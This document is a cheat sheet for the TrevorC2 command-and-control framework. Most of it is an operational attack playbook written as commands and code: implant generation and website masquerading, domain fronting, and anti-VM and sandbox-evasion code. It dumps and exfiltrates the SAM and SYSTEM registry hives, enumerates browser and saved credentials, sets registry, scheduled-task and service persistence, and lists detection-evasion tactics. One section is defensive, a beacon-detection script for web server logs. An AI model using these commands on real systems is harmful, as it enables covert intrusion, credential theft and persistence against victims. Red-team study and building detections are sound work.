TrevorC2 Framework Cheat Sheet

Overview

TrevorC2 is a client/server framework that tunnels command-and-control traffic through what looks like ordinary browsing of a legitimate website. Developed by TrustedSec, it serves a real, browsable website as the front for C2 communications, which makes the traffic hard to distinguish from normal web browsing and therefore difficult to detect.

⚠️ Warning: This tool is intended for authorized penetration testing and red team exercises only. Ensure you have proper authorization before using in any environment.

Installation

Git Installation

```bash
# Clone the repository
git clone https://github.com/trustedsec/trevorc2.git
cd trevorc2

# Install Python dependencies
pip3 install -r requirements.txt
```

Manual Setup

```bash
# Download latest release
wget https://github.com/trustedsec/trevorc2/archive/master.zip
unzip master.zip
cd trevorc2-master

# Install dependencies (pycryptodome provides the Crypto package used for AES-GCM;
# the unmaintained pycrypto has no GCM mode and fails to build on current Python)
pip3 install pycryptodome requests
```

Docker Installation

```bash
# Build Docker container
git clone https://github.com/trustedsec/trevorc2.git
cd trevorc2
docker build -t trevorc2 .

# Run container
docker run -it -p 443:443 trevorc2
```

Basic Usage

Server Setup

```bash
# Start TrevorC2 server
python3 trevorc2_server.py

# Start server with custom configuration
python3 trevorc2_server.py --config custom_config.py

# Start server on specific port
python3 trevorc2_server.py --port 8080
```

Client Deployment

```bash
# Generate client
python3 trevorc2_client.py

# Generate client with custom server
python3 trevorc2_client.py --server https://example.com

# Generate PowerShell client
python3 trevorc2_client.py --powershell
```

Command Reference

Server Commands

| Command | Description |
| --- | --- |
| `help` | Display help menu |
| `list` | List active agents |
| `interact <id>` | Interact with agent |
| `kill <id>` | Kill specific agent |
| `killall` | Kill all agents |
| `exit` | Exit server |

Agent Interaction

| Command | Description |
| --- | --- |
| `shell <command>` | Execute shell command |
| `upload <local> <remote>` | Upload file to agent |
| `download <remote> <local>` | Download file from agent |
| `screenshot` | Take screenshot |
| `keylogger start` | Start keylogger |
| `keylogger stop` | Stop keylogger |
| `keylogger dump` | Dump keylogger data |
| `persistence` | Install persistence |
| `migrate <pid>` | Migrate to process |
| `back` | Background agent |

Configuration

Server Configuration

```python
# config.py
BIND_PORT = 443
HOSTNAME = "0.0.0.0"
WEBSITE_FOLDER = "site/"
CERT_FILE = "server.pem"

# Encryption settings
CIPHER_TYPE = "AES"
HASH_TYPE = "SHA256"

# Communication settings
BEACON_INTERVAL = 10
JITTER = 0.2

# Logging
LOG_FILE = "trevorc2.log"
DEBUG = False
```

Client Configuration

```python
# Client settings
SERVER_URL = "https://example.com"
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
SLEEP_TIME = 10
JITTER = 0.2

# Persistence settings
PERSISTENCE_METHOD = "registry"
PERSISTENCE_KEY = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
```

Advanced Features

Website Masquerading

```bash
# Set up legitimate website front
mkdir site
cp -r /var/www/html/* site/

# Use custom website
python3 trevorc2_server.py --site /path/to/website

# Clone existing website
wget -r -p -k https://example.com
python3 trevorc2_server.py --site example.com/
```

SSL/TLS Configuration

```bash
# Generate self-signed certificate
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes

# Use custom certificate
python3 trevorc2_server.py --cert /path/to/cert.pem --key /path/to/key.pem

# Let's Encrypt certificate
certbot certonly --standalone -d yourdomain.com
python3 trevorc2_server.py --cert /etc/letsencrypt/live/yourdomain.com/fullchain.pem --key /etc/letsencrypt/live/yourdomain.com/privkey.pem
```

Domain Fronting

```python
# Configure domain fronting
FRONT_DOMAIN = "cdn.example.com"
HOST_HEADER = "legitimate-site.com"

# Client configuration for domain fronting
client_config = {
    'server_url': 'https://cdn.example.com',
    'host_header': 'legitimate-site.com',
    'sni': 'cdn.example.com'
}
```

Client Generation

Windows Client

```bash
# Generate Windows executable
python3 trevorc2_client.py --windows --output client.exe

# Generate PowerShell client
python3 trevorc2_client.py --powershell --output client.ps1

# Generate batch file client
python3 trevorc2_client.py --batch --output client.bat
```

Linux Client

```bash
# Generate Linux binary
python3 trevorc2_client.py --linux --output client

# Generate Python client
python3 trevorc2_client.py --python --output client.py

# Generate shell script client
python3 trevorc2_client.py --shell --output client.sh
```

macOS Client

```bash
# Generate macOS binary
python3 trevorc2_client.py --macos --output client

# Generate AppleScript client
python3 trevorc2_client.py --applescript --output client.scpt
```

Evasion Techniques

Traffic Obfuscation

```python
# Custom User-Agent strings
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36"
]

# Random beacon intervals
import random
SLEEP_TIME = random.randint(5, 15)
```

Payload Encoding

```bash
# Base64 encode payload
echo "payload" | base64

# XOR encode payload (Python 3: bytes.hex() replaces the Python 2-only str.encode('hex'))
python3 -c "
import sys
key = 0xAA
payload = sys.argv[1].encode()
encoded = bytes(b ^ key for b in payload)
print(encoded.hex())
" "your_payload"
```

Anti-Analysis

```python
# VM detection
import subprocess

def check_vm():
    vm_indicators = ['VMware', 'VirtualBox', 'QEMU']
    try:
        output = subprocess.check_output('systeminfo', shell=True)
        for indicator in vm_indicators:
            if indicator in output.decode(errors='replace'):
                return True
    except (subprocess.CalledProcessError, OSError):
        # command missing or failed; a bare except would also swallow KeyboardInterrupt
        pass
    return False

# Sandbox evasion
import time

def sandbox_evasion():
    time.sleep(60)  # Sleep to avoid sandbox analysis
    # Check for mouse movement, user activity, etc.
```

Post-Exploitation

Information Gathering

```bash
# System information
shell systeminfo
shell whoami /all
shell net user
shell net group

# Network information
shell ipconfig /all
shell netstat -an
shell arp -a
shell route print
```

Credential Harvesting

```bash
# Dump SAM database
shell reg save HKLM\SAM sam.hiv
shell reg save HKLM\SYSTEM system.hiv
download sam.hiv
download system.hiv

# Browser credentials
shell dir "%APPDATA%\Mozilla\Firefox\Profiles"
shell dir "%LOCALAPPDATA%\Google\Chrome\User Data\Default"

# Saved passwords
shell cmdkey /list
```

Lateral Movement

```bash
# Network discovery
shell net view
shell ping -n 1 192.168.1.1-254

# Share enumeration
shell net view \\target-computer
shell dir \\target-computer\c$

# Service enumeration
shell sc query
shell tasklist /svc
```

Persistence Mechanisms

```bash
# Registry persistence
shell reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Update" /d "C:\temp\client.exe"

# Scheduled task
shell schtasks /create /tn "Update" /tr "C:\temp\client.exe" /sc onlogon

# Service persistence
shell sc create "UpdateService" binpath= "C:\temp\client.exe"
shell sc config "UpdateService" start= auto
```

Operational Security

Communication Security

```python
# Encrypted communications (Crypto package from pycryptodome)
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes

def encrypt_data(data, key):
    # AES-GCM picks a fresh 16-byte nonce per message; the tag authenticates
    # the ciphertext, so the receiver must split nonce (16) + tag (16) + ciphertext
    cipher = AES.new(key, AES.MODE_GCM)
    ciphertext, tag = cipher.encrypt_and_digest(data.encode())
    return cipher.nonce + tag + ciphertext

# Certificate pinning
import socket
import ssl

def verify_certificate(hostname, cert_path, port=443):
    # Trust only the pinned certificate file (no system CA store) and keep
    # hostname checking on: with check_hostname disabled, any name signed by
    # that certificate would pass, which defeats the point of pinning
    context = ssl.create_default_context(cafile=cert_path)
    context.check_hostname = True
    context.verify_mode = ssl.CERT_REQUIRED
    with socket.create_connection((hostname, port)) as sock:
        with context.wrap_socket(sock, server_hostname=hostname) as tls:
            return tls.getpeercert()  # raises ssl.SSLError if the pin fails
```

Operational Procedures

  • Rotate infrastructure regularly
  • Use different domains and IPs
  • Implement proper logging and monitoring
  • Use legitimate certificates
  • Vary communication patterns

Troubleshooting

Connection Issues

```bash
# Check server status
netstat -tlnp | grep :443

# Test connectivity
curl -k https://your-server.com

# Check firewall rules
iptables -L
ufw status
```

Client Issues

```python
# Debug client connection: add debug prints around the request in the client code
# (response is the requests Response object returned by the client's request)
print("Connecting to server...")
print(f"Response: {response.status_code}")
```

```bash
# Check DNS resolution
nslookup your-server.com
dig your-server.com
```

Certificate Problems

```bash
# Verify certificate
openssl x509 -in server.pem -text -noout

# Test SSL connection
openssl s_client -connect your-server.com:443

# Check certificate chain
curl -vI https://your-server.com
```

Detection Evasion

Network Level

  • Use legitimate domains and certificates
  • Implement domain fronting
  • Vary communication intervals
  • Use common ports (80, 443)
  • Mimic legitimate traffic patterns
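From the defender's side, a polling client configured like the server settings above (BEACON_INTERVAL = 10 with JITTER = 0.2) still leaves a statistical fingerprint in the web server's access log: one source requesting one path at nearly constant spacing. The following detection example is added here and is not part of TrevorC2; it runs over constructed combined-format log lines, and the IP addresses, timestamps and thresholds are made up for illustration.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed combined-format log (not real traffic): 10.0.0.5 polls "/" every
# ~10 s with +/-20% jitter; 10.0.0.9 is an ordinary browsing session.
UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
SAMPLE_LOG = "\n".join(
    f'{ip} - - [10/Mar/2024:12:{t} +0000] "GET {path} HTTP/1.1" 200 5120 "-" "{UA}"'
    for ip, t, path in [
        ("10.0.0.5", "00:00", "/"), ("10.0.0.9", "00:03", "/"),
        ("10.0.0.9", "00:04", "/style.css"), ("10.0.0.5", "00:11", "/"),
        ("10.0.0.5", "00:20", "/"), ("10.0.0.9", "00:30", "/about.html"),
        ("10.0.0.5", "00:31", "/"), ("10.0.0.5", "00:40", "/"),
        ("10.0.0.5", "00:49", "/"), ("10.0.0.5", "01:00", "/"),
        ("10.0.0.5", "01:11", "/"), ("10.0.0.9", "01:45", "/contact.html"),
        ("10.0.0.9", "02:00", "/"), ("10.0.0.9", "02:02", "/logo.png"),
    ]
)
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_log(text):
    """Yield (ip, user_agent, path, timestamp); malformed lines are skipped."""
    for m in filter(None, map(LINE_RE.match, text.splitlines())):
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        yield m["ip"], m["ua"], m["path"], ts

def beacon_candidates(text, min_requests=6, max_cv=0.3):
    """Flag (ip, user agent) pairs whose request gaps are nearly constant
    (low coefficient of variation) and that keep hitting a single path."""
    groups = defaultdict(list)
    for ip, ua, path, ts in parse_log(text):
        groups[(ip, ua)].append((ts, path))
    findings = {}
    for key, hits in groups.items():
        hits.sort()
        if len(hits) < min_requests:
            continue
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(hits, hits[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")
        if cv <= max_cv and len({p for _, p in hits}) == 1:
            findings[key] = {"requests": len(hits), "mean_gap": round(mean, 1),
                             "cv": round(cv, 3)}
    return findings
```

With 20% uniform jitter the coefficient of variation stays around 0.1, well under the 0.3 threshold, while the browsing session scores above 1 and touches several paths, so only 10.0.0.5 is reported.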

Host Level

  • Avoid common IOCs
  • Use legitimate process names
  • Implement anti-VM techniques
  • Use fileless execution
  • Encrypt payloads and communications

Behavioral

  • Limit resource usage
  • Avoid suspicious activities
  • Use legitimate user agents
  • Implement proper error handling
  • Clean up artifacts

This cheat sheet provides a comprehensive reference for using TrevorC2. Always ensure you have proper authorization before using this tool in any environment.